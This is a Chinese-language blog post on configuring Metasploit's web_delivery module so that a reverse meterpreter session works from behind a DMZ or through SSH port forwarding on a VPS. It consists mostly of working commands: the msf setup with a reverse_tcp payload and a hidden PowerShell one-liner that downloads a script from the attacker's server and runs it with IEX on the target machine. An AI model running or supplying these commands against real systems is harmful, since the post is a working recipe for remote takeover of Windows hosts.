DMZ下使用web_delivery 介绍

From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral

之前碰到的问题，自己的主机做了DMZ，设置[b]web_delivery[/b]时，发现将lhost设置成外网ip，则脚本不能运行，如果设置成内网ip，则反弹payload反弹的地址为内网地址，即不可能获取到会话，查看详细配置信息，发现存在reverselistenerbindaddress 设置选项，解决了此问题，当然，此参数也适用于用vps转发端口使用本地msf的情况。详细配置如下：

使用vps转发 8081 端口到本地8081端口 (web_delivery服务端口)

1. ssh -N -R 8081:ip:8081 user@ip

使用vps转发 6666 端口到本地6666端口 （web_delivery payload 监听端口）

1. ssh -N -R 6666:ip:6666 user@ip

msf开启并配置web_delivery

1. msf > use exploit/multi/script/web_delivery
2. msf exploit(web_delivery) > set target 2 //Powershell
3. target => 2
4. msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
5. payload => windows/meterpreter/reverse_tcp
6. msf exploit(web_delivery) > set SRVPORT 8081
7. SRVPORT => 8081
8. msf exploit(web_delivery) > set URIPATH /
9. URIPATH => /
10. msf exploit(web_delivery) > set lhost ip #外网ip地址
11. lhost => ip
12. msf exploit(web_delivery) > set lport 6666
13. lport => 6666
14. msf exploit(web_delivery) > set reverselistenerbindaddress 192.168.2.100 #内网ip地址
15. reverselistenerbindaddress => 192.168.2.100
16. msf exploit(web_delivery) > exploit
17. [*] Exploit running as background job.
19. [*] Started reverse TCP handler on 192.168.2.100:6666
20. msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/
21. [*] Local IP: http://192.168.2.100:8081/
22. [*] Server started.
23. [*] Run the following command on the target machine:
24. powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

客户端执行：
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

内网msf获取meterpreter会话。

DMZ情形下，不需要做端口转发，只需要把lhost设置为外网ip地址，reverselistenerbindaddress 设置为内网ip地址即可。